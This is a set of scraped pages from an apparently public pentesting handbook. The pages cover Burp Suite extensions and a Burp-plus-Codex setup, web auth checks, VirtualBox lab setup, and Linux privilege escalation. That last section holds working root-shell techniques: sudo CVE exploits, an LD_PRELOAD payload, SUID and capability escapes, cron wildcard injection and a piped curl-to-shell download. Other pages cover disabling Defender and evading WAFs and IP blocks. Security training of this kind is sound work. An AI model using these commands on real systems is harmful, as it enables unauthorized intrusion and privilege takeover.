[![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c29d223d&sv=2)Make Burp Suite your own: high-powered extensibility to customize and enhance your testing. šŸ› ļøPortSwigger Blog](https://portswigger.net/blog/make-burp-suite-your-own-high-powered-extensibility-to-customize-and-enhance-your-testing) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=21fe07f0&sv=2)GitHub - Ignitetechnologies/BurpSuite-For-Pentester: This cheatsheet is built for the Bug Bounty Hunters and penetration testers in order to help them hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite".GitHub](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester) * [Burp Bounty Pro](https://burpbounty.net/) : Active and passive checks customizable based on patterns. * [Active Scan ++](https://portswigger.net/bappstore/3123d5b5f25c4128894d97ea1acc4976) More active and passive scans. * [Software Vulnerability Scanner](https://portswigger.net/bappstore/c9fb79369b56407792a7104e3c4352fb) Passive scan to detect vulnerable software versions * [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) Passive scan to detect hidden or unlinked parameters, cache poisoning * [Backslash Powered Scanner](https://portswigger.net/bappstore/9cff8c55432a45808432e26dbb2b41d8) Active scan for SSTI detection * [CSRF Scanner](https://portswigger.net/bappstore/60f172f27a9b49a1b538ed414f9f27c3) Passive CSRF detection * [Freddy](https://portswigger.net/bappstore/ae1cce0c6d6c47528b4af35faebc3ab3) Active and Passive scan for Java and .NET deserialization * [JSON Web Tokens](https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6) decode and manipulate JSON web tokens * [Reissue Request Scripter](https://portswigger.net/bappstore/6e0b53d8c801471c9dc614a016d8a20d) generates scripts for Python, Ruby, Perl, PHP and PowerShell * [Burp-exporter](https://github.com/artssec/burp-exporter) other extension for export request to multiple languages * [Retire.js](https://portswigger.net/bappstore/36238b534a78494db9bf2d03f112265c) Passive scan to find vulnerable JavaScript libraries * [Web Cache Deception Scanner](https://portswigger.net/bappstore/7c1ca94a61474d9e897d307c858d52f0) Active scan for Web Cache Deception vulnerability * [Cookie decrypter](https://portswigger.net/bappstore/76c500c3fdba4a37a6fca46fe18d8ada) Passive check for decrypt/decode Netscaler, F5 BigIP, and Flask cookies * [Reflector](https://github.com/elkokc/reflector) Passive scan to find reflected XSS * [J2EEScan](https://portswigger.net/bappstore/7ec6d429fed04cdcb6243d8ba7358880) Active checks to discover different kind of J2EE vulnerabilities * [HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) Active scanner and launcher for HTTP Request Smuggling attacks * [Flow](https://portswigger.net/bappstore/ee1c45f4cc084304b2af4b7e92c0a49d) History of all burp tools, extensions and tests * [Taborator](https://portswigger.net/bappstore/c9c37e424a744aa08866652f63ee9e0f) Allows Burp Collaborator in a new tab * [Turbo Intruder](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988) Useful for sending large numbers of HTTP requests (Race cond, fuzz, user enum) * [Auto Repeater](https://portswigger.net/bappstore/f89f2837c22c4ab4b772f31522647ed8) Automatically repeats requests with replacement rules and response diffing * [Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) Tests multiple upload vulnerabilities * [poi Slinger](https://github.com/portswigger/poi-slinger) : Active scan check to find PHP object injection * [Java Deserialization Scanner](https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae) Active and passive scanner to find Java deserialization vulnerabilities * [Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) Used to detect IDORs * [Match/Replace Session Action](https://portswigger.net/bappstore/9b5c532966ca4d5eb13c09c72ba7aac2) Provides a match and replace function as a Session Handling Rule. * [.NET Beautifier](https://portswigger.net/bappstore/e2a137ad44984ccb908375fa5b2c618d) Easy view for VIEWSTATE parameter * [Wsdler](https://portswigger.net/bappstore/594a49bb233748f2bc80a9eb18a2e08f) generates SOAP requests from WSDL request * [Collaborator Everywhere](https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968) Inject headers to reveal backend systems by causing pingbacks * [Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) Exfiltrate blind remote code execution output over DNS * [Bypass WAF](https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c) Add some headers to bypass some WAFs * [SAMLRaider](https://github.com/CompassSecurity/SAMLRaider) for testing SAML infrastructures, messages and certificates * [GoldenNuggets-1](https://github.com/GainSec/GoldenNuggets-1) create wordlists from target * [Logger++](https://portswigger.net/bappstore/470b7057b86f41c396a97903377f3d81) Log for every burp tool and allows highlight, filter, grep, export... * [OpenAPI Parser](https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c) Parse and fetch OpenAPI documents directly from a URL * [CO2](https://github.com/portswigger/co2) : Multiple functions such sqlmapper, cewler * [XSSValidator](https://github.com/PortSwigger/xss-validator) : XSS intruder payload generator and checker * [Shelling](https://github.com/ewilded/shelling) : command injection payload generator * [burp-send-to](https://github.com/bytebutcher/burp-send-to) : Adds a customizable "Send to..."-context-menu. * [ssrf-king](https://github.com/ethicalhackingplayground/ssrf-king?s=09) : Automates SSRF detection [](https://www.pentest-book.com/others/burp#private-collaborator-server) Private collaborator server --------------------------------------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=21fe07f0&sv=2)GitHub - putsi/privatecollaborator: A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificateGitHub](https://github.com/putsi/privatecollaborator) [https://blog.roughwire.com/?p=24blog.roughwire.com](https://blog.roughwire.com/?p=24) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fteamrot.fi%2Fwp-content%2Fuploads%2F2020%2F08%2Fcropped-ROT2-WHITE-BG.eps_-2-192x192.png&width=20&dpr=3&quality=100&sign=1ca6f3a1&sv=2)Self-hosted Burp collaborator with custom domain – Team ROT Information Securityteamrot.fi](https://teamrot.fi/self-hosted-burp-collaborator-with-custom-domain) [](https://www.pentest-book.com/others/burp#burp-macros) Burp macros ------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fv2%2Fresize%3Afill%3A304%3A304%2F10fd5c419ac61637245384e7099e131627900034828f4f386bdaa47a74eae156&width=20&dpr=3&quality=100&sign=8a320988&sv=2)Burp Macros: What, Why & How?Medium](https://akshita-infosec.medium.com/burp-macros-what-why-how-151df8901641) [](https://www.pentest-book.com/others/burp#collaborator-ssrf-explotation-mindmap) Collaborator SSRF explotation [mindmap](https://github.com/iustin24/SSRF) ------------------------------------------------------------------------------------------------------------------------------------------------------------------ ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MLBtDR-NwyWvWQKwine%252F-MLBtpjgyra0n8WwTYDL%252Fimage.png%3Falt%3Dmedia%26token%3D1fc2ade7-e25e-44aa-bfc4-f8d415a39d5f&width=768&dpr=3&quality=100&sign=34c57b12&sv=2) ### [](https://www.pentest-book.com/others/burp#dom-invader) DOM Invader [https://caramel-calcium-f39.notion.site/DOM-Invader-1a78e4ba7acc4ca3987b8136bcf1ddd5caramel-calcium-f39.notion.site](https://caramel-calcium-f39.notion.site/DOM-Invader-1a78e4ba7acc4ca3987b8136bcf1ddd5) [PreviousiOS](https://www.pentest-book.com/mobile/ios) [NextPassword cracking](https://www.pentest-book.com/others/password-cracking) Last updated 5 months ago Was this helpful? * [Burp MCP + Codex CLI](https://www.pentest-book.com/others/burp#burp-mcp--codex-cli) * [What you get](https://www.pentest-book.com/others/burp#what-you-get) * [1\. Install Burp MCP Server](https://www.pentest-book.com/others/burp#id-1.-install-burp-mcp-server) * [2\. Configure Codex MCP](https://www.pentest-book.com/others/burp#id-2.-configure-codex-mcp) * [3\. Install Caddy reverse proxy](https://www.pentest-book.com/others/burp#id-3.-install-caddy-reverse-proxy) * [4\. Create the Caddyfile](https://www.pentest-book.com/others/burp#id-4.-create-the-caddyfile) * [5\. Start everything](https://www.pentest-book.com/others/burp#id-5.-start-everything) * [6\. Test it](https://www.pentest-book.com/others/burp#id-6.-test-it) * [7\. One-command launcher (optional)](https://www.pentest-book.com/others/burp#id-7.-one-command-launcher-optional) * [Tips](https://www.pentest-book.com/others/burp#tips) * [Proxy options](https://www.pentest-book.com/others/burp#proxy-options) * [Preferred extensions](https://www.pentest-book.com/others/burp#preferred-extensions) * [Private collaborator server](https://www.pentest-book.com/others/burp#private-collaborator-server) * [Burp macros](https://www.pentest-book.com/others/burp#burp-macros) * [Collaborator SSRF explotation mindmap](https://www.pentest-book.com/others/burp#collaborator-ssrf-explotation-mindmap) * [DOM Invader](https://www.pentest-book.com/others/burp#dom-invader) Was this helpful? Copy mcp-proxy.jar Copy ~/.codex/config.toml Copy [mcp_servers.burp] command = "java" args = ["-jar", "/absolute/path/to/mcp-proxy.jar", "--sse-url", "http://127.0.0.1:19876"] Copy brew install caddy Copy ~/burp-mcp/Caddyfile Copy :19876 reverse_proxy 127.0.0.1:9876 { # Match Origin and Host exactly (anti-DNS rebinding) header_up Host "127.0.0.1:9876" header_up Origin "http://127.0.0.1:9876" # Workaround for current Burp MCP SSE 403 bug header_up -User-Agent header_up -Accept header_up -Accept-Encoding header_up -Connection } Copy caddy run --config ~/burp-mcp/Caddyfile & codex Copy /mcp Copy From Burp history, find all endpoints that use numeric IDs and lack Authorization headers. Copy Using Burp MCP, identify potential IDOR endpoints and suggest safe confirmation steps. Copy From Burp data, write a vulnerability report with reproduction, impact and remediation. Copy burpcodex() { emulate -L zsh setopt pipefail local CADDYFILE="$HOME/burp-mcp/Caddyfile" local LOG="/tmp/burp-mcp-caddy.log" local CADDY_PID="" if ! command -v caddy >/dev/null 2>&1; then echo "[!] caddy not found (brew install caddy)" return 1 fi if ! command -v codex >/dev/null 2>&1; then echo "[!] codex not found in PATH" return 1 fi if [[ ! -f "$CADDYFILE" ]]; then echo "[!] Caddyfile not found: $CADDYFILE" return 1 fi cleanup() { # 1) Kill captured PID (if still alive) if [[ -n "$CADDY_PID" ]] && kill -0 "$CADDY_PID" 2>/dev/null; then kill -TERM "$CADDY_PID" 2>/dev/null sleep 0.2 kill -KILL "$CADDY_PID" 2>/dev/null wait "$CADDY_PID" 2>/dev/null fi # 2) Fallback: kill anything still listening on 19876 local pids pids="$(lsof -ti tcp:19876 2>/dev/null | tr '\n' ' ')" if [[ -n "$pids" ]]; then kill -TERM $pids 2>/dev/null sleep 0.2 kill -KILL $pids 2>/dev/null fi } trap 'cleanup; return 130' INT TERM trap 'cleanup' EXIT # Start caddy caddy run --config "$CADDYFILE" >"$LOG" 2>&1 & CADDY_PID=$! echo "[*] Caddy started (pid=$CADDY_PID) - log: $LOG" # Run codex (foreground) command codex "$@" # Ensure cleanup even if trap didn't trigger for some reason cleanup trap - INT TERM EXIT } Copy burpcodex Copy - If Render Page crash: sudo sysctl -w kernel.unprivileged_userns_clone=1 - If embedded browser crash due sandbox: find .BurpSuite -name chrome-sandbox -exec chown root:root {} \; -exec chmod 4755 {} \; - Scope with all subdomains: .*\.test\.com$ - Use Intruder to target specific parameters for scanning - Right click: actively scan defined insertion points # Configuration - Project Options -> HTTP -> Redirections -> Enable JavaScript-driven - User Options -> Misc -> Proxy Interception -> Always disabled - Target -> Site Map -> Show all && Show only in-scope items # XSS Validator extension 1) Start xss.js phantomjs $HOME/.BurpSuite/bapps/xss.js 2) Send Request to Intruder 3) Mark Position 4) Import xss-payload-list from $Tools into xssValidator 5) Change Payload Type to Extension Generated 6) Change Payload Process to Invoke-Burp Extension - XSS Validator 7) Add Grep-Match rule as per XSS Validator 8) Start. # Filter the noise https://gist.github.com/vsec7/d5518a432b70714bedad79e4963ff320 # Filter the noise TLDR # TLS Pass Through .*\.google\.com .*\.gstatic\.com .*\.googleapis\.com .*\.pki\.goog .*\.mozilla\.com # Send swagger to burp https://github.com/RhinoSecurityLabs/Swagger-EZ # Hosted: https://rhinosecuritylabs.github.io/Swagger-EZ/ # If some request/response breaks or slow down Burp - Project options -> HTTP -> Streaming responses -> Add url and uncheck "Store streaming responses...." # Burp Extension rotate IP yo avoid IP restrictions https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension # Collab/SSRF/pingback alternative interactsh.com ceye.io requestcatcher.com canarytokens.org webhook.site ngrok.com pingb.in swin.es requestbin.net ssrftest.com rbnd.gl0.eu dnslog.cn beeceptor.com # Run private collaborator instance in AWS https://github.com/Leoid/AWSBurpCollaborator # Run your own collab server https://github.com/yeswehack/pwn-machine # Wordlist from burp project file cat project.burp | strings | tok | sort -u > custom_wordlist.txt # Autorize: 1. Copy cookies from low priv user and paste in Autorize 2. Set filters (scope, regex) 3. Set Autorize ON 4. Navigate as high priv user # Turbo Intruder basic.py -> Set %s in the injection point and specify wordlist in script multipleParameters.py -> Set %s in all the injection points and specify the wordlists in script # Match and Replace https://github.com/daffainfo/match-replace-burp # Customize Audit Scans Configure your audit profile -> Issues reported -> Individual issues -> right-click on "Extension generated issues" -> "Edit detection methods" Works on most of issues like SQLi # Send to local Burp from VPS # In local computer ssh -R 8080:127.0.0.1:8080 root@VPS_IP -f -N # In VPS curl URL -x http://127.0.0.1:8080 # Ip rotation https://github.com/ustayready/fireprox --- # General Info | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/web/general-info.md) . [](https://www.pentest-book.com/enumeration/web/general-info#auth-headers) Auth headers -------------------------------------------------------------------------------------------- Copy # Basic Auth (B64) Authorization: Basic AXVubzpwQDU1dzByYM== # Bearer Token (JWT) Authorization: Bearer # API Key GET /endpoint?api_key=abcdefgh123456789 X-API-Key: abcdefgh123456789 # Digest Auth Authorization: Digest username=ā€adminā€ Realm=ā€abcxyzā€ nonce=ā€474754847743646ā€, uri=ā€/uriā€ response=ā€7cffhfr54685gnnfgerg8ā€ # OAuth2.0 Authorization: Bearer hY_9.B5f-4.1BfE # Hawk Authentication Authorization: Hawk id="abcxyz123", ts="1592459563", nonce="gWqbkw", mac="vxBCccCutXGV30gwEDKu1NDXSeqwfq7Z0sg/HP1HjOU=" # AWS signature Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aws4_ [](https://www.pentest-book.com/enumeration/web/general-info#common-checks) Common checks ---------------------------------------------------------------------------------------------- Copy # robots.txt curl http://example.com/robots.txt # headers wget --save-headers http://www.example.com/ # Strict-Transport-Security (HSTS) # X-Frame-Options: SAMEORIGIN # X-XSS-Protection: 1; mode=block # X-Content-Type-Options: nosniff # Cookies # Check Secure and HttpOnly flag in session cookie # If exists BIG-IP cookie, app behind a load balancer # SSL Ciphers nmap --script ssl-enum-ciphers -p 443 www.example.com # HTTP Methods nmap -p 443 --script http-methods www.example.com # Cross Domain Policy curl http://example.com/crossdomain.xml # allow-access-from domain="*" # Cookies explained https://cookiepedia.co.uk/ [](https://www.pentest-book.com/enumeration/web/general-info#security-headers-explanation) Security headers explanation ---------------------------------------------------------------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MKK9bBod-Qo9cJcjTDS%252F-MKKBayvDAl5GAzaSO7O%252Fimage.png%3Falt%3Dmedia%26token%3Dde94307a-6f76-42b0-9383-7f7e701f7d5c&width=768&dpr=3&quality=100&sign=8cd89e1c&sv=2) [PreviousWeb Attacks](https://www.pentest-book.com/enumeration/web) [NextQuick tricks](https://www.pentest-book.com/enumeration/web/quick-tricks) Last updated 5 years ago Was this helpful? * [Auth headers](https://www.pentest-book.com/enumeration/web/general-info#auth-headers) * [Common checks](https://www.pentest-book.com/enumeration/web/general-info#common-checks) * [Security headers explanation](https://www.pentest-book.com/enumeration/web/general-info#security-headers-explanation) Was this helpful? --- # VirtualBox | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/virtualbox.md) . > **Skill Level**: Beginner to Intermediate **Prerequisites**: Basic virtualization concepts [](https://www.pentest-book.com/others/virtualbox#performance-optimization) Performance Optimization --------------------------------------------------------------------------------------------------------- Copy # Enable nested virtualization (Intel) VBoxManage modifyvm "VM Name" --nested-hw-virt on # Allocate resources appropriately VBoxManage modifyvm "VM Name" --cpus 4 --memory 8192 --vram 256 # Enable PAE/NX for 64-bit guests VBoxManage modifyvm "VM Name" --pae on # Use paravirtualized network adapter (faster) VBoxManage modifyvm "VM Name" --nictype1 virtio # Enable disk caching VBoxManage storagectl "VM Name" --name "SATA Controller" --hostiocache on # Use SSD optimization VBoxManage storageattach "VM Name" --storagectl "SATA Controller" --port 0 --nonrotational on [](https://www.pentest-book.com/others/virtualbox#network-configuration-for-labs) Network Configuration for Labs --------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/others/virtualbox#internal-pentest-lab-network) Internal Pentest Lab Network ### [](https://www.pentest-book.com/others/virtualbox#nat-network-with-port-forwarding) NAT Network with Port Forwarding [](https://www.pentest-book.com/others/virtualbox#macos-guest-setup) MacOS Guest Setup ------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#windows-target-setup) Windows Target Setup ------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#kali-linux-setup) Kali Linux Setup ----------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#snapshots-and-clones) Snapshots & Clones ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#vulnerable-lab-vms) Vulnerable Lab VMs --------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#headless-operation) Headless Operation --------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/others/virtualbox#related-topics) Related Topics ------------------------------------------------------------------------------------- * [Lab Setup Guide](https://www.pentest-book.com/others/lab-setup-guide) - Docker labs and more * [Docker/Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) - Container testing [PreviousPassword cracking](https://www.pentest-book.com/others/password-cracking) [NextLLM/AI/ML/prompt testing](https://www.pentest-book.com/others/llm-ai-ml-prompt-testing) Last updated 5 months ago Was this helpful? * [Performance Optimization](https://www.pentest-book.com/others/virtualbox#performance-optimization) * [Network Configuration for Labs](https://www.pentest-book.com/others/virtualbox#network-configuration-for-labs) * [Internal Pentest Lab Network](https://www.pentest-book.com/others/virtualbox#internal-pentest-lab-network) * [NAT Network with Port Forwarding](https://www.pentest-book.com/others/virtualbox#nat-network-with-port-forwarding) * [MacOS Guest Setup](https://www.pentest-book.com/others/virtualbox#macos-guest-setup) * [Windows Target Setup](https://www.pentest-book.com/others/virtualbox#windows-target-setup) * [Kali Linux Setup](https://www.pentest-book.com/others/virtualbox#kali-linux-setup) * [Snapshots & Clones](https://www.pentest-book.com/others/virtualbox#snapshots-and-clones) * [Vulnerable Lab VMs](https://www.pentest-book.com/others/virtualbox#vulnerable-lab-vms) * [Headless Operation](https://www.pentest-book.com/others/virtualbox#headless-operation) * [Related Topics](https://www.pentest-book.com/others/virtualbox#related-topics) Was this helpful? Copy # Create internal network for isolated testing VBoxManage modifyvm "Kali" --nic1 nat --nic2 intnet --intnet2 "pentestlab" VBoxManage modifyvm "Target-Windows" --nic1 intnet --intnet1 "pentestlab" VBoxManage modifyvm "Target-Linux" --nic1 intnet --intnet1 "pentestlab" # Host-only network for accessing VMs from host VBoxManage hostonlyif create VBoxManage hostonlyif ipconfig "vboxnet0" --ip 192.168.56.1 --netmask 255.255.255.0 VBoxManage modifyvm "Kali" --nic3 hostonly --hostonlyadapter3 "vboxnet0" Copy # Create NAT network VBoxManage natnetwork add --netname "PentestNAT" --network "10.0.2.0/24" --enable # Port forwarding rules VBoxManage natnetwork modify --netname "PentestNAT" --port-forward-4 "ssh:tcp:[]:2222:[10.0.2.15]:22" VBoxManage natnetwork modify --netname "PentestNAT" --port-forward-4 "http:tcp:[]:8080:[10.0.2.15]:80" Copy # Tested in ElCapitan(10.11) to Sonoma(14) # Find and download your desired vmdk file # Add your VM using existing disk # Set Chipset ICH9 # Enable PAE/NX # Video Memory 128 MB # After created: cd "C:\Program Files\Oracle\VirtualBox\" VBoxManage.exe modifyvm "VM Name" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff VBoxManage setextradata "VM Name" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3" VBoxManage setextradata "VM Name" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0" VBoxManage setextradata "VM Name" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple" VBoxManage setextradata "VM Name" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" VBoxManage setextradata "VM Name" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1 # For Apple Silicon compatibility (limited support) # Use UTM or Parallels instead for M1/M2/M3 Macs Copy # Download Windows evaluation VMs # https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/ # Disable Windows Defender for testing VBoxManage guestcontrol "Windows" run --exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \ --username Administrator --password password -- -Command "Set-MpPreference -DisableRealtimeMonitoring $true" Copy # Download Kali VM # https://www.kali.org/get-kali/#kali-virtual-machines # First boot setup sudo apt update && sudo apt full-upgrade -y # Install additional tools sudo apt install -y gobuster feroxbuster seclists wordlists # Configure shared folders VBoxManage sharedfolder add "Kali" --name "shared" --hostpath "/path/to/shared" --automount # In Kali: mount -t vboxsf shared /mnt/shared Copy # Take snapshot before testing VBoxManage snapshot "VM Name" take "Clean-State" --description "Before exploitation" # Restore snapshot VBoxManage snapshot "VM Name" restore "Clean-State" # Clone VM for multiple tests VBoxManage clonevm "VM Name" --name "VM-Clone" --register --mode machine # Linked clone (saves disk space) VBoxManage clonevm "VM Name" --name "VM-Linked" --register --mode machine --options link Copy # Metasploitable 2/3 https://sourceforge.net/projects/metasploitable/ # VulnHub collection https://www.vulnhub.com/ # DVWA (Docker) docker run --rm -it -p 80:80 vulnerables/web-dvwa # HackTheBox retired machines # TryHackMe rooms Copy # Start VM headless (no GUI) VBoxManage startvm "VM Name" --type headless # Control headless VM VBoxManage controlvm "VM Name" poweroff VBoxManage controlvm "VM Name" pause VBoxManage controlvm "VM Name" resume # List running VMs VBoxManage list runningvms --- # Linux | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/post-exploitation/linux.md) . > **Skill Level**: Intermediate to Advanced **Prerequisites**: Linux administration, privilege model [](https://www.pentest-book.com/post-exploitation/linux#privilege-escalation) Privilege Escalation ------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/post-exploitation/linux#automated-enumeration-tools) Automated Enumeration Tools Copy # LinPEAS - Most comprehensive # https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # LinEnum # https://github.com/rebootuser/LinEnum ./LinEnum.sh -t -k password -r LinEnum.txt # Linux Smart Enumeration # https://github.com/diego-treitos/linux-smart-enumeration ./lse.sh -l 2 # linux-exploit-suggester # https://github.com/mzet-/linux-exploit-suggester ./linux-exploit-suggester.sh # pspy - Monitor processes without root # https://github.com/DominicBreuker/pspy ./pspy64 -pf -i 1000 ### [](https://www.pentest-book.com/post-exploitation/linux#sudo-exploitation) Sudo Exploitation ### [](https://www.pentest-book.com/post-exploitation/linux#suid-sgid-binaries) SUID/SGID Binaries ### [](https://www.pentest-book.com/post-exploitation/linux#capabilities) Capabilities ### [](https://www.pentest-book.com/post-exploitation/linux#cron-jobs) Cron Jobs ### [](https://www.pentest-book.com/post-exploitation/linux#kernel-exploits) Kernel Exploits ### [](https://www.pentest-book.com/post-exploitation/linux#nfs-exploitation) NFS Exploitation ### [](https://www.pentest-book.com/post-exploitation/linux#writable-files-and-directories) Writable Files & Directories ### [](https://www.pentest-book.com/post-exploitation/linux#docker-escape) Docker Escape [](https://www.pentest-book.com/post-exploitation/linux#credential-harvesting) Credential Harvesting --------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#persistence) Persistence ------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#lateral-movement) Lateral Movement ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#local-enum) Local Enum ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#escaping-restricted-shell) Escaping restricted shell ----------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#loot) Loot ----------------------------------------------------------------------- [](https://www.pentest-book.com/post-exploitation/linux#related-topics) Related Topics ------------------------------------------------------------------------------------------- * [Windows Post-Exploitation](https://www.pentest-book.com/post-exploitation/windows) - Windows privilege escalation * [Kerberos Attacks](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks) - Kerberos ticket attacks * [Pivoting](https://www.pentest-book.com/post-exploitation/pivoting) - Network pivoting techniques * [RT/EDR Evasion](https://www.pentest-book.com/others/rt-edr) - Defense evasion [PreviousModern C2 Frameworks](https://www.pentest-book.com/exploitation/modern-c2) [NextmacOS](https://www.pentest-book.com/post-exploitation/macos) Last updated 5 months ago Was this helpful? * [Privilege Escalation](https://www.pentest-book.com/post-exploitation/linux#privilege-escalation) * [Automated Enumeration Tools](https://www.pentest-book.com/post-exploitation/linux#automated-enumeration-tools) * [Sudo Exploitation](https://www.pentest-book.com/post-exploitation/linux#sudo-exploitation) * [SUID/SGID Binaries](https://www.pentest-book.com/post-exploitation/linux#suid-sgid-binaries) * [Capabilities](https://www.pentest-book.com/post-exploitation/linux#capabilities) * [Cron Jobs](https://www.pentest-book.com/post-exploitation/linux#cron-jobs) * [Kernel Exploits](https://www.pentest-book.com/post-exploitation/linux#kernel-exploits) * [NFS Exploitation](https://www.pentest-book.com/post-exploitation/linux#nfs-exploitation) * [Writable Files & Directories](https://www.pentest-book.com/post-exploitation/linux#writable-files-and-directories) * [Docker Escape](https://www.pentest-book.com/post-exploitation/linux#docker-escape) * [Credential Harvesting](https://www.pentest-book.com/post-exploitation/linux#credential-harvesting) * [Persistence](https://www.pentest-book.com/post-exploitation/linux#persistence) * [Lateral Movement](https://www.pentest-book.com/post-exploitation/linux#lateral-movement) * [Local Enum](https://www.pentest-book.com/post-exploitation/linux#local-enum) * [Escaping restricted shell](https://www.pentest-book.com/post-exploitation/linux#escaping-restricted-shell) * [Loot](https://www.pentest-book.com/post-exploitation/linux#loot) * [Related Topics](https://www.pentest-book.com/post-exploitation/linux#related-topics) Was this helpful? Copy # Check sudo permissions sudo -l sudo -l -l # GTFOBins sudo exploits # https://gtfobins.github.io/ # Sudo version exploit (CVE-2021-3156 - Baron Samedit) # Affects sudo < 1.9.5p2 sudoedit -s '\' $(python3 -c 'print("A"*1000)') # Sudo CVE-2019-14287 (sudo < 1.8.28) # If you can run as !root sudo -u#-1 /bin/bash # LD_PRELOAD exploitation (if env_keep+=LD_PRELOAD in sudo -l) # Create malicious .so: cat > /tmp/shell.c << EOF #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } EOF gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles sudo LD_PRELOAD=/tmp/shell.so # Sudo token reuse (if sudo was used recently in another terminal) # https://github.com/nongiach/sudo_inject ./exploit.sh Copy # Find SUID binaries find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null # Find SGID binaries find / -perm -2000 -type f 2>/dev/null find / -perm -g=s -type f 2>/dev/null # Find SUID owned by current user find / -perm /u=s -user `whoami` 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null # Check GTFOBins for SUID exploits # https://gtfobins.github.io/#+suid # Common SUID exploits # Bash SUID /bin/bash -p # Python SUID python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # Find SUID find . -exec /bin/sh -p \; -quit # Vim SUID vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' # Custom SUID binary analysis ltrace ./binary 2>&1 # Look for insecure function calls strace ./binary 2>&1 # System calls strings ./binary # Hardcoded paths/credentials Copy # List files with capabilities getcap -r / 2>/dev/null # Exploitable capabilities # cap_setuid - Python example python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' # cap_net_raw - Packet sniffing tcpdump -i eth0 -w /tmp/capture.pcap # cap_dac_read_search - Read any file ./binary /etc/shadow # cap_net_bind_service - Bind to privileged ports # Useful for service impersonation # cap_sys_admin - Mount filesystems, abuse cgroups # https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ Copy # Enumerate cron jobs crontab -l cat /etc/crontab ls -la /etc/cron.* cat /etc/cron.d/* cat /var/spool/cron/crontabs/* systemctl list-timers --all # Monitor for cron execution # https://github.com/DominicBreuker/pspy ./pspy64 # Cron with wildcard injection # If cron runs: tar czf /tmp/backup.tar.gz * echo "" > "/path/--checkpoint=1" echo "" > "/path/--checkpoint-action=exec=sh shell.sh" # Writable cron script echo 'cp 